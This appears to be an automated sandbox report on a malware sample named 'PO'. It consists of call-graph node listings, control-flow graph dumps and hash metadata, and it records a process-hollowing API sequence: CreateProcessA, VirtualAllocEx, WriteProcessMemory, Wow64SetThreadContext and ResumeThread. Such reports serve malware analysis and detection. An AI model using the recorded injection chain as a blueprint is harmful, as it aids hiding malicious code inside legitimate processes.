42810->42814 42819 5b74ac0 42810->42819 42811 70e2ba8 42815 5b74afb 42814->42815 42816 5b74aea 42814->42816 42815->42816 42824 70e2c18 42815->42824 42830 70e2c09 42815->42830 42816->42811 42820 5b74afb 42819->42820 42821 5b74aea 42819->42821 42820->42821 42822 70e2c18 DrawTextExW 42820->42822 42823 70e2c09 DrawTextExW 42820->42823 42821->42811 42822->42821 42823->42821 42825 70e2c43 42824->42825 42836 70e2408 42825->42836 42828 70e2408 DrawTextExW 42829 70e2dfd 42828->42829 42829->42816 42831 70e2c43 42830->42831 42832 70e2408 DrawTextExW 42831->42832 42833 70e2c6b 42832->42833 42834 70e2408 DrawTextExW 42833->42834 42835 70e2dfd 42833->42835 42834->42835 42835->42816 42837 70e2413 42836->42837 42838 70e2c6b 42837->42838 42841 5b718a9 42837->42841 42846 5b718b8 42837->42846 42838->42828 42838->42829 42842 5b718b8 42841->42842 42843 5b718ee 42842->42843 42851 5b70438 42842->42851 42843->42837 42848 5b718d9 42846->42848 42847 5b718ee 42847->42837 42848->42847 42849 5b70438 DrawTextExW 42848->42849 42850 5b7193e 42849->42850 42852 5b70443 42851->42852 42855 5b727cc 42852->42855 42854 5b7193e 42857 5b727d7 42855->42857 42856 5b73431 42856->42854 42857->42856 42861 5b74350 42857->42861 42864 5b74340 42857->42864 42858 5b73535 42858->42854 42867 5b73d5c 42861->42867 42865 5b7436d 42864->42865 42866 5b73d5c DrawTextExW 42864->42866 42865->42858 42866->42865 42868 5b74388 DrawTextExW 42867->42868 42870 5b7436d 42868->42870 42870->42858 42871 5b700e8 42872 5b700fa 42871->42872 42873 5b70110 42871->42873 42876 5b70670 42872->42876 42884 5b70660 42872->42884 42877 5b706fe 42876->42877 42878 5b7096e 42877->42878 42882 5b718a9 DrawTextExW 42877->42882 42883 5b718b8 DrawTextExW 42877->42883 42879 5b7163c 42878->42879 42892 5b749b8 42878->42892 42895 5b749c8 42878->42895 42879->42873 42882->42877 42883->42877 42885 5b706fe 42884->42885 42886 5b7096e 42885->42886 42888 5b718a9 DrawTextExW 42885->42888 42889 5b718b8 DrawTextExW 42885->42889 42887 5b7163c 42886->42887 42890 5b749b8 DrawTextExW 42886->42890 42891 5b749c8 DrawTextExW 42886->42891 42887->42873 42888->42885 42889->42885 42890->42887 42891->42887 42898 5b73d94 42892->42898 42894 5b749e5 42894->42879 42896 5b73d94 DrawTextExW 42895->42896 42897 5b749e5 42895->42897 42896->42897 42897->42879 42900 5b73d9f 42898->42900 42899 5b74a73 42899->42894 42900->42899 42902 5b74a90 DrawTextExW 42900->42902 42903 5b74ac0 DrawTextExW 42900->42903 42901 5b74a6f 42901->42894 42902->42901 42903->42901 42904 7a5447a 42905 7a54464 42904->42905 42906 7a54474 42904->42906 42905->42906 42909 7a574f1 42905->42909 42925 7a57500 42905->42925 42910 7a5751a 42909->42910 42911 7a5753e 42910->42911 42941 7a57aef 42910->42941 42946 7a57c19 42910->42946 42950 7a57b13 42910->42950 42955 7a57951 42910->42955 42959 7a580d6 42910->42959 42964 7a57b97 42910->42964 42969 7a58177 42910->42969 42974 7a57a54 42910->42974 42979 7a57b55 42910->42979 42984 7a57d55 42910->42984 42989 7a57e0a 42910->42989 42994 7a57caa 42910->42994 42998 7a5804e 42910->42998 42911->42906 42926 7a5751a 42925->42926 42927 7a5753e 42926->42927 42928 7a57aef 2 API calls 42926->42928 42929 7a5804e 4 API calls 42926->42929 42930 7a57caa 2 API calls 42926->42930 42931 7a57e0a 2 API calls 42926->42931 42932 7a57d55 2 API calls 42926->42932 42933 7a57b55 2 API calls 42926->42933 42934 7a57a54 2 API calls 42926->42934 42935 7a58177 2 API calls 42926->42935 42936 7a57b97 2 API calls 42926->42936 42937 7a580d6 2 API calls 42926->42937 42938 7a57951 2 API calls 42926->42938 42939 7a57b13 2 API calls 42926->42939 42940 7a57c19 2 API calls 42926->42940 42927->42906 42928->42927 42929->42927 42930->42927 42931->42927 42932->42927 42933->42927 42934->42927 42935->42927 42936->42927 42937->42927 42938->42927 42939->42927 42940->42927 42942 7a57af4 42941->42942 42943 7a579ac 42942->42943 43006 7a53dd0 42942->43006 43010 7a53dc9 42942->43010 42943->42911 43014 7a58564 42946->43014 43019 7a58568 42946->43019 42947 7a57c35 42947->42911 42951 7a57b19 42950->42951 42952 7a579ac 42951->42952 42953 7a53dd0 ReadProcessMemory 42951->42953 42954 7a53dc9 ReadProcessMemory 42951->42954 42952->42911 42953->42951 42954->42951 43032 7a53f5c 42955->43032 43036 7a53f68 42955->43036 42960 7a57a73 42959->42960 42960->42959 42961 7a579ac 42960->42961 43040 7a53a90 42960->43040 43044 7a53a98 42960->43044 42961->42911 42965 7a57bba 42964->42965 43048 7a53ce0 42965->43048 43052 7a53cd9 42965->43052 42966 7a58158 42970 7a57b2a 42969->42970 42971 7a579ac 42970->42971 42972 7a53dd0 ReadProcessMemory 42970->42972 42973 7a53dc9 ReadProcessMemory 42970->42973 42971->42911 42972->42970 42973->42970 42975 7a57a5a 42974->42975 42976 7a579ac 42975->42976 42977 7a53a90 ResumeThread 42975->42977 42978 7a53a98 ResumeThread 42975->42978 42976->42911 42977->42975 42978->42975 42980 7a57b62 42979->42980 42982 7a53ce0 WriteProcessMemory 42980->42982 42983 7a53cd9 WriteProcessMemory 42980->42983 42981 7a57e7a 42982->42981 42983->42981 42985 7a57d5e 42984->42985 42987 7a53ce0 WriteProcessMemory 42985->42987 42988 7a53cd9 WriteProcessMemory 42985->42988 42986 7a58201 42987->42986 42988->42986 42990 7a57b7f 42989->42990 42991 7a579ac 42990->42991 42992 7a53dd0 ReadProcessMemory 42990->42992 42993 7a53dc9 ReadProcessMemory 42990->42993 42991->42911 42992->42990 42993->42990 43056 7a53b40 42994->43056 43060 7a53b48 42994->43060 42995 7a57cc4 42999 7a5805b 42998->42999 43001 7a57a72 42998->43001 43004 7a53b40 Wow64SetThreadContext 42999->43004 43005 7a53b48 Wow64SetThreadContext 42999->43005 43000 7a579ac 43000->42911 43001->43000 43002 7a53a90 ResumeThread 43001->43002 43003 7a53a98 ResumeThread 43001->43003 43002->43001 43003->43001 43004->43001 43005->43001 43007 7a53e1b ReadProcessMemory 43006->43007 43009 7a53e5f 43007->43009 43009->42942 43011 7a53dd0 ReadProcessMemory 43010->43011 43013 7a53e5f 43011->43013 43013->42942 43015 7a58568 43014->43015 43024 7a53c20 43015->43024 43028 7a53c18 43015->43028 43016 7a5859c 43016->42947 43020 7a5857d 43019->43020 43022 7a53c20 VirtualAllocEx 43020->43022 43023 7a53c18 VirtualAllocEx 43020->43023 43021 7a5859c 43021->42947 43022->43021 43023->43021 43025 7a53c60 VirtualAllocEx 43024->43025 43027 7a53c9d 43025->43027 43027->43016 43029 7a53c20 VirtualAllocEx 43028->43029 43031 7a53c9d 43029->43031 43031->43016 43033 7a53f68 CreateProcessA 43032->43033 43035 7a541b3 43033->43035 43035->43035 43037 7a53ff1 CreateProcessA 43036->43037 43039 7a541b3 43037->43039 43039->43039 43041 7a53a98 ResumeThread 43040->43041 43043 7a53b09 43041->43043 43043->42960 43045 7a53ad8 ResumeThread 43044->43045 43047 7a53b09 43045->43047 43047->42960 43049 7a53d28 WriteProcessMemory 43048->43049 43051 7a53d7f 43049->43051 43051->42966 43053 7a53ce0 WriteProcessMemory 43052->43053 43055 7a53d7f 43053->43055 43055->42966 43057 7a53b48 Wow64SetThreadContext 43056->43057 43059 7a53bd5 43057->43059 43059->42995 43061 7a53b8d Wow64SetThreadContext 43060->43061 43063 7a53bd5 43061->43063 43063->42995

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 784 70e4fe8-70e5013 785 70e501a-70e5060 784->785 786 70e5015 784->786 891 70e5065 call 70e5810 785->891 892 70e5065 call 70e5820 785->892 786->785 787 70e506b 896 70e506c call 70e585e 787->896 897 70e506c call 70e5860 787->897 788 70e5072-70e50ad 791 70e50ae 788->791 792 70e50b5-70e50d1 791->792 793 70e50da-70e50db 792->793 794 70e50d3 792->794 795 70e50dd-70e510d 793->795 796 70e5124-70e513a 793->796 794->791 794->795 794->796 797 70e510f-70e5122 794->797 798 70e540c 794->798 799 70e516d-70e5180 794->799 800 70e536d-70e5380 794->800 801 70e520a-70e520e 794->801 802 70e52ab-70e52ba 794->802 803 70e53ab 794->803 804 70e5305-70e531f 794->804 805 70e5182-70e5198 794->805 806 70e5382 794->806 807 70e51e3-70e51ec 794->807 808 70e5241-70e526f 794->808 809 70e5321 794->809 810 70e519a-70e51b9 794->810 811 70e53da-70e53f5 794->811 812 70e513b 794->812 813 70e51bb-70e51de 794->813 814 70e53f7-70e540a 794->814 815 70e5274-70e5278 794->815 816 70e5350-70e536b 794->816 817 70e51f1-70e5205 794->817 795->792 796->812 797->792 837 70e5427 798->837 820 70e5142-70e515e 799->820 819 70e5328-70e5344 800->819 822 70e5210-70e521f 801->822 823 70e5221-70e5228 801->823 903 70e52c0 call 70e5e38 802->903 904 70e52c0 call 70e5e29 802->904 821 70e53b2-70e53ce 803->821 804->806 804->809 805->820 806->803 807->820 808->820 809->819 810->820 811->821 812->820 813->820 814->821 824 70e527a-70e5289 815->824 825 70e528b-70e5292 815->825 816->819 817->820 827 70e534d-70e534e 819->827 828 70e5346 819->828 829 70e5167-70e5168 820->829 830 70e5160 820->830 832 70e53d7-70e53d8 821->832 833 70e53d0 821->833 836 70e522f-70e523c 822->836 823->836 839 70e5299-70e52a6 824->839 825->839 827->806 827->816 828->798 828->800 828->803 828->806 828->809 828->811 828->814 828->816 842 70e548e 828->842 843 70e5462 828->843 844 70e54c3-70e5525 828->844 845 70e56fc-70e56ff 828->845 846 70e5598-70e55e7 828->846 847 70e5579 828->847 829->799 829->804 830->798 830->799 830->800 830->801 830->802 830->803 830->804 830->805 830->806 830->807 830->808 830->809 830->810 830->811 830->812 830->813 830->814 830->815 830->816 830->817 832->798 832->811 833->798 833->803 833->811 833->814 833->837 833->842 833->843 833->844 833->845 833->846 833->847 848 70e564a-70e56b2 833->848 849 70e54ab-70e54be 833->849 850 70e5762-70e5769 833->850 851 70e5561-70e5574 833->851 836->820 852 70e542e-70e544a 837->852 839->820 913 70e5491 call 70eaa58 842->913 914 70e5491 call 70eaa49 842->914 909 70e5465 call 70e5e38 843->909 910 70e5465 call 70e5e29 843->910 889 70e552b call 70e8338 844->889 890 70e552b call 70e8348 844->890 905 70e5702 call 70e9298 845->905 906 70e5702 call 70e92a8 845->906 911 70e55ed call 70e8338 846->911 912 70e55ed call 70e8348 846->912 907 70e557b call 7a586b0 847->907 908 70e557b call 7a586c0 847->908 875 70e56dc 848->875 876 70e56b4-70e56c0 848->876 849->852 851->852 853 70e545c-70e545d 852->853 854 70e544c 852->854 853->843 853->850 854->837 854->842 854->843 854->844 854->845 854->846 854->847 854->848 854->849 854->850 854->851 855 70e52c6-70e52d2 893 70e52d8 call 70e5ec8 855->893 894 70e52d8 call 70e5ed8 855->894 895 70e52d8 call 70e5f14 855->895 856 70e5708-70e571f 898 70e5724 call 70e61bc 856->898 899 70e5724 call 70e99ab 856->899 900 70e5724 call 70e95f3 856->900 901 70e5724 call 70e96d0 856->901 902 70e5724 call 70e95f0 856->902 857 70e5581-70e5593 859 70e546b-70e548c 859->852 860 70e5497-70e54a9 860->852 863 70e52de-70e5300 863->820 865 70e572a-70e5730 870 70e573c-70e575d 865->870 874 70e55f3-70e5600 877 70e562a 874->877 878 70e5602-70e560e 874->878 882 70e56e2-70e56f7 875->882 879 70e56ca-70e56d0 876->879 880 70e56c2-70e56c8 876->880 885 70e5630-70e5645 877->885 883 70e5618-70e561e 878->883 884 70e5610-70e5616 878->884 886 70e56da 879->886 880->886 881 70e5531-70e555c 881->852 882->852 887 70e5628 883->887 884->887 885->852 886->882 887->885 889->881 890->881 891->787 892->787 893->863 894->863 895->863 896->788 897->788 898->865 899->865 900->865 901->865 902->865 903->855 904->855 905->856 906->856 907->857 908->857 909->859 910->859 911->874 912->874 913->860 914->860
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q$$]q$$]q
                        • API String ID: 0-203493588
                        • Opcode ID: aab71b670e7e889d1fce9343b6f3e61de46a8c86f486602b9046b1b9aa109210
                        • Instruction ID: 8ac1eea88e989f3b29cb8fa9ef049ee347be2b16db4e90ac58e051eb492f2508
                        • Opcode Fuzzy Hash: aab71b670e7e889d1fce9343b6f3e61de46a8c86f486602b9046b1b9aa109210
                        • Instruction Fuzzy Hash: 0A2223B4E15218CFDB18CFA5D98479DBBB6FF89300F20996AD419AB364DB309941CF14

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1594 70e4fd8-70e5013 1595 70e501a-70e5060 1594->1595 1596 70e5015 1594->1596 1711 70e5065 call 70e5810 1595->1711 1712 70e5065 call 70e5820 1595->1712 1596->1595 1597 70e506b 1716 70e506c call 70e585e 1597->1716 1717 70e506c call 70e5860 1597->1717 1598 70e5072-70e50ad 1601 70e50ae 1598->1601 1602 70e50b5-70e50d1 1601->1602 1603 70e50da-70e50db 1602->1603 1604 70e50d3 1602->1604 1605 70e50dd-70e510d 1603->1605 1606 70e5124-70e513a 1603->1606 1604->1601 1604->1605 1604->1606 1607 70e510f-70e5122 1604->1607 1608 70e540c 1604->1608 1609 70e516d-70e5180 1604->1609 1610 70e536d-70e5380 1604->1610 1611 70e520a-70e520e 1604->1611 1612 70e52ab-70e52ba 1604->1612 1613 70e53ab 1604->1613 1614 70e5305-70e531f 1604->1614 1615 70e5182-70e5198 1604->1615 1616 70e5382 1604->1616 1617 70e51e3-70e51ec 1604->1617 1618 70e5241-70e526f 1604->1618 1619 70e5321 1604->1619 1620 70e519a-70e51b9 1604->1620 1621 70e53da-70e53f5 1604->1621 1622 70e513b 1604->1622 1623 70e51bb-70e51de 1604->1623 1624 70e53f7-70e540a 1604->1624 1625 70e5274-70e5278 1604->1625 1626 70e5350-70e536b 1604->1626 1627 70e51f1-70e5205 1604->1627 1605->1602 1606->1622 1607->1602 1647 70e5427 1608->1647 1630 70e5142-70e515e 1609->1630 1629 70e5328-70e5344 1610->1629 1632 70e5210-70e521f 1611->1632 1633 70e5221-70e5228 1611->1633 1723 70e52c0 call 70e5e38 1612->1723 1724 70e52c0 call 70e5e29 1612->1724 1631 70e53b2-70e53ce 1613->1631 1614->1616 1614->1619 1615->1630 1616->1613 1617->1630 1618->1630 1619->1629 1620->1630 1621->1631 1622->1630 1623->1630 1624->1631 1634 70e527a-70e5289 1625->1634 1635 70e528b-70e5292 1625->1635 1626->1629 1627->1630 1637 70e534d-70e534e 1629->1637 1638 70e5346 1629->1638 1639 70e5167-70e5168 1630->1639 1640 70e5160 1630->1640 1642 70e53d7-70e53d8 1631->1642 1643 70e53d0 1631->1643 1646 70e522f-70e523c 1632->1646 1633->1646 1649 70e5299-70e52a6 1634->1649 1635->1649 1637->1616 1637->1626 1638->1608 1638->1610 1638->1613 1638->1616 1638->1619 1638->1621 1638->1624 1638->1626 1652 70e548e 1638->1652 1653 70e5462 1638->1653 1654 70e54c3-70e5525 1638->1654 1655 70e56fc-70e56ff 1638->1655 1656 70e5598-70e55e7 1638->1656 1657 70e5579 1638->1657 1639->1609 1639->1614 1640->1608 1640->1609 1640->1610 1640->1611 1640->1612 1640->1613 1640->1614 1640->1615 1640->1616 1640->1617 1640->1618 1640->1619 1640->1620 1640->1621 1640->1622 1640->1623 1640->1624 1640->1625 1640->1626 1640->1627 1642->1608 1642->1621 1643->1608 1643->1613 1643->1621 1643->1624 1643->1647 1643->1652 1643->1653 1643->1654 1643->1655 1643->1656 1643->1657 1658 70e564a-70e56b2 1643->1658 1659 70e54ab-70e54be 1643->1659 1660 70e5762-70e5769 1643->1660 1661 70e5561-70e5574 1643->1661 1646->1630 1662 70e542e-70e544a 1647->1662 1649->1630 1707 70e5491 call 70eaa58 1652->1707 1708 70e5491 call 70eaa49 1652->1708 1703 70e5465 call 70e5e38 1653->1703 1704 70e5465 call 70e5e29 1653->1704 1709 70e552b call 70e8338 1654->1709 1710 70e552b call 70e8348 1654->1710 1699 70e5702 call 70e9298 1655->1699 1700 70e5702 call 70e92a8 1655->1700 1705 70e55ed call 70e8338 1656->1705 1706 70e55ed call 70e8348 1656->1706 1701 70e557b call 7a586b0 1657->1701 1702 70e557b call 7a586c0 1657->1702 1685 70e56dc 1658->1685 1686 70e56b4-70e56c0 1658->1686 1659->1662 1661->1662 1663 70e545c-70e545d 1662->1663 1664 70e544c 1662->1664 1663->1653 1663->1660 1664->1647 1664->1652 1664->1653 1664->1654 1664->1655 1664->1656 1664->1657 1664->1658 1664->1659 1664->1660 1664->1661 1665 70e52c6-70e52d2 1713 70e52d8 call 70e5ec8 1665->1713 1714 70e52d8 call 70e5ed8 1665->1714 1715 70e52d8 call 70e5f14 1665->1715 1666 70e5708-70e571f 1718 70e5724 call 70e61bc 1666->1718 1719 70e5724 call 70e99ab 1666->1719 1720 70e5724 call 70e95f3 1666->1720 1721 70e5724 call 70e96d0 1666->1721 1722 70e5724 call 70e95f0 1666->1722 1667 70e5581-70e5593 1669 70e546b-70e548c 1669->1662 1670 70e5497-70e54a9 1670->1662 1673 70e52de-70e5300 1673->1630 1675 70e572a-70e5730 1680 70e573c-70e575d 1675->1680 1684 70e55f3-70e5600 1687 70e562a 1684->1687 1688 70e5602-70e560e 1684->1688 1692 70e56e2-70e56f7 1685->1692 1689 70e56ca-70e56d0 1686->1689 1690 70e56c2-70e56c8 1686->1690 1695 70e5630-70e5645 1687->1695 1693 70e5618-70e561e 1688->1693 1694 70e5610-70e5616 1688->1694 1696 70e56da 1689->1696 1690->1696 1691 70e5531-70e555c 1691->1662 1692->1662 1697 70e5628 1693->1697 1694->1697 1695->1662 1696->1692 1697->1695 1699->1666 1700->1666 1701->1667 1702->1667 1703->1669 1704->1669 1705->1684 1706->1684 1707->1670 1708->1670 1709->1691 1710->1691 1711->1597 1712->1597 1713->1673 1714->1673 1715->1673 1716->1598 1717->1598 1718->1675 1719->1675 1720->1675 1721->1675 1722->1675 1723->1665 1724->1665
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 4af9d077977439e75bcaa961a87d79b1cc75535d0f9e19951a546c650ce50aa7
                        • Instruction ID: b01c1df9def1eed64b8c66cd8e84c5d263390c15504ab48aac0f43f6ea14719d
                        • Opcode Fuzzy Hash: 4af9d077977439e75bcaa961a87d79b1cc75535d0f9e19951a546c650ce50aa7
                        • Instruction Fuzzy Hash: 9F1223B4E15218CFDB18CFA5D98479DBBB2FF89300F20996AD419AB364DB309981CF14

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1725 70e539c-70e53a3 1726 70e5385-70e539a 1725->1726 1727 70e53a5-70e53a9 1725->1727 1726->1727 1728 70e540c 1727->1728 1729 70e53ab 1727->1729 1732 70e5427 1728->1732 1731 70e53b2-70e53ce 1729->1731 1733 70e53d7-70e53d8 1731->1733 1734 70e53d0 1731->1734 1736 70e542e-70e544a 1732->1736 1733->1728 1735 70e53da-70e53f5 1733->1735 1734->1728 1734->1729 1734->1732 1734->1735 1737 70e548e 1734->1737 1738 70e564a-70e56b2 1734->1738 1739 70e54ab-70e54be 1734->1739 1740 70e5462 1734->1740 1741 70e5762-70e5769 1734->1741 1742 70e54c3-70e5525 1734->1742 1743 70e5561-70e5574 1734->1743 1744 70e56fc-70e56ff 1734->1744 1745 70e5598-70e55e7 1734->1745 1746 70e5579 1734->1746 1747 70e53f7-70e540a 1734->1747 1735->1731 1748 70e545c-70e545d 1736->1748 1749 70e544c 1736->1749 1785 70e5491 call 70eaa58 1737->1785 1786 70e5491 call 70eaa49 1737->1786 1769 70e56dc 1738->1769 1770 70e56b4-70e56c0 1738->1770 1739->1736 1783 70e5465 call 70e5e38 1740->1783 1784 70e5465 call 70e5e29 1740->1784 1787 70e552b call 70e8338 1742->1787 1788 70e552b call 70e8348 1742->1788 1743->1736 1789 70e5702 call 70e9298 1744->1789 1790 70e5702 call 70e92a8 1744->1790 1798 70e55ed call 70e8338 1745->1798 1799 70e55ed call 70e8348 1745->1799 1791 70e557b call 7a586b0 1746->1791 1792 70e557b call 7a586c0 1746->1792 1747->1731 1748->1740 1748->1741 1749->1732 1749->1737 1749->1738 1749->1739 1749->1740 1749->1741 1749->1742 1749->1743 1749->1744 1749->1745 1749->1746 1751 70e546b-70e548c 1751->1736 1752 70e5708-70e571f 1793 70e5724 call 70e61bc 1752->1793 1794 70e5724 call 70e99ab 1752->1794 1795 70e5724 call 70e95f3 1752->1795 1796 70e5724 call 70e96d0 1752->1796 1797 70e5724 call 70e95f0 1752->1797 1753 70e5497-70e54a9 1753->1736 1754 70e5581-70e5593 1760 70e572a-70e5730 1765 70e573c-70e575d 1760->1765 1768 70e55f3-70e5600 1771 70e562a 1768->1771 1772 70e5602-70e560e 1768->1772 1778 70e56e2-70e56f7 1769->1778 1773 70e56ca-70e56d0 1770->1773 1774 70e56c2-70e56c8 1770->1774 1779 70e5630-70e5645 1771->1779 1776 70e5618-70e561e 1772->1776 1777 70e5610-70e5616 1772->1777 1780 70e56da 1773->1780 1774->1780 1775 70e5531-70e555c 1775->1736 1781 70e5628 1776->1781 1777->1781 1778->1736 1779->1736 1780->1778 1781->1779 1783->1751 1784->1751 1785->1753 1786->1753 1787->1775 1788->1775 1789->1752 1790->1752 1791->1754 1792->1754 1793->1760 1794->1760 1795->1760 1796->1760 1797->1760 1798->1768 1799->1768
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: bfe53beb6090393a0f9f5b785a39c351d56837c72acb873a9ea848a7193e70ef
                        • Instruction ID: aade9b25fc4a9b30c900693e106918ff96490e6005189ea81a06911c8aeecf8f
                        • Opcode Fuzzy Hash: bfe53beb6090393a0f9f5b785a39c351d56837c72acb873a9ea848a7193e70ef
                        • Instruction Fuzzy Hash: 67A105B4E14218CFDB14CFA5DD84B9DBBB6FF89304F2089AAD409A7264DB309991CF15

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1800 70e5387-70e53a9 1802 70e540c 1800->1802 1803 70e53ab 1800->1803 1805 70e5427 1802->1805 1804 70e53b2-70e53ce 1803->1804 1806 70e53d7-70e53d8 1804->1806 1807 70e53d0 1804->1807 1809 70e542e-70e544a 1805->1809 1806->1802 1808 70e53da-70e53f5 1806->1808 1807->1802 1807->1803 1807->1805 1807->1808 1810 70e548e 1807->1810 1811 70e564a-70e56b2 1807->1811 1812 70e54ab-70e54be 1807->1812 1813 70e5462 1807->1813 1814 70e5762-70e5769 1807->1814 1815 70e54c3-70e5525 1807->1815 1816 70e5561-70e5574 1807->1816 1817 70e56fc-70e56ff 1807->1817 1818 70e5598-70e55e7 1807->1818 1819 70e5579 1807->1819 1820 70e53f7-70e540a 1807->1820 1808->1804 1821 70e545c-70e545d 1809->1821 1822 70e544c 1809->1822 1867 70e5491 call 70eaa58 1810->1867 1868 70e5491 call 70eaa49 1810->1868 1842 70e56dc 1811->1842 1843 70e56b4-70e56c0 1811->1843 1812->1809 1865 70e5465 call 70e5e38 1813->1865 1866 70e5465 call 70e5e29 1813->1866 1869 70e552b call 70e8338 1815->1869 1870 70e552b call 70e8348 1815->1870 1816->1809 1871 70e5702 call 70e9298 1817->1871 1872 70e5702 call 70e92a8 1817->1872 1863 70e55ed call 70e8338 1818->1863 1864 70e55ed call 70e8348 1818->1864 1856 70e557b call 7a586b0 1819->1856 1857 70e557b call 7a586c0 1819->1857 1820->1804 1821->1813 1821->1814 1822->1805 1822->1810 1822->1811 1822->1812 1822->1813 1822->1814 1822->1815 1822->1816 1822->1817 1822->1818 1822->1819 1824 70e546b-70e548c 1824->1809 1825 70e5708-70e571f 1858 70e5724 call 70e61bc 1825->1858 1859 70e5724 call 70e99ab 1825->1859 1860 70e5724 call 70e95f3 1825->1860 1861 70e5724 call 70e96d0 1825->1861 1862 70e5724 call 70e95f0 1825->1862 1826 70e5497-70e54a9 1826->1809 1827 70e5581-70e5593 1833 70e572a-70e5730 1838 70e573c-70e575d 1833->1838 1841 70e55f3-70e5600 1844 70e562a 1841->1844 1845 70e5602-70e560e 1841->1845 1851 70e56e2-70e56f7 1842->1851 1846 70e56ca-70e56d0 1843->1846 1847 70e56c2-70e56c8 1843->1847 1852 70e5630-70e5645 1844->1852 1849 70e5618-70e561e 1845->1849 1850 70e5610-70e5616 1845->1850 1853 70e56da 1846->1853 1847->1853 1848 70e5531-70e555c 1848->1809 1854 70e5628 1849->1854 1850->1854 1851->1809 1852->1809 1853->1851 1854->1852 1856->1827 1857->1827 1858->1833 1859->1833 1860->1833 1861->1833 1862->1833 1863->1841 1864->1841 1865->1824 1866->1824 1867->1826 1868->1826 1869->1848 1870->1848 1871->1825 1872->1825
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 1e8353e9845428cfefa07ec054fe60e30f2d56faf4104515f61d49ce6cb3e9da
                        • Instruction ID: 32d6d2ab33bdb1cb58bba5b66c13d016e337b86076c4f636d7385428e562891e
                        • Opcode Fuzzy Hash: 1e8353e9845428cfefa07ec054fe60e30f2d56faf4104515f61d49ce6cb3e9da
                        • Instruction Fuzzy Hash: C4A105B4E14218CFDB14CFA5DD84B9DBBB6FF89304F2089AAD409A7264DB309991CF15
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID: 'T$$]q$$]q
                        • API String ID: 0-3917162498
                        • Opcode ID: 115e90b76879d2c39a142e4bb9f6fc402b4b87a7dc664e962302fe460b991a11
                        • Instruction ID: a421d21e827e1ee3a82c5814b15f9cd24d41038b05a36d2a2b0c1f1a3f7d87b5
                        • Opcode Fuzzy Hash: 115e90b76879d2c39a142e4bb9f6fc402b4b87a7dc664e962302fe460b991a11
                        • Instruction Fuzzy Hash: 3B91E2B8E14218CFDB14CFA5D985B9DBBB6FF89200F2085AAE409A7364DB305991CF15
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e00cfc60dca68f0334699df68bbfa5f6ecc7ad36e70292629b8be41da508231f
                        • Instruction ID: 9ceb12fb8c544a8a01d9aa1da77adc29569aa3637f365b45cf787ce0a41602d0
                        • Opcode Fuzzy Hash: e00cfc60dca68f0334699df68bbfa5f6ecc7ad36e70292629b8be41da508231f
                        • Instruction Fuzzy Hash: D522E471D10A1ACECB11EF69C8506D9FBB5FF99300F1086AAD549B7210EB70AAD5CF80
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f63490e163b04b358ae57afaebf758f81401a2da432b45722dcc22dee178e2d
                        • Instruction ID: 7d23f57c57b79998c1cea4b8da570a9313dc19fed3089d13849027630ffd7824
                        • Opcode Fuzzy Hash: 3f63490e163b04b358ae57afaebf758f81401a2da432b45722dcc22dee178e2d
                        • Instruction Fuzzy Hash: 0302E271D10A2ACECB11EF68C8506D9FBB5FF99300F1186AAD54977210EB70AAD5CF80
                        Memory Dump Source
                        • Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_70e0000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 033808d368c9bfb182fb49d7afdcd56f5ccf5043d2e66b6958e659a2d517ed54
                        • Instruction ID: e5ecf483673915f8e069c731371603ba09c4cded1945e90927163a8445743807
                        • Opcode Fuzzy Hash: 033808d368c9bfb182fb49d7afdcd56f5ccf5043d2e66b6958e659a2d517ed54
                        • Instruction Fuzzy Hash: 30C19EB4E24219DFCB18CFA5D8804EEFFB6FF8A310F10952AD455AB250DB34A906CB51
                        Memory Dump Source
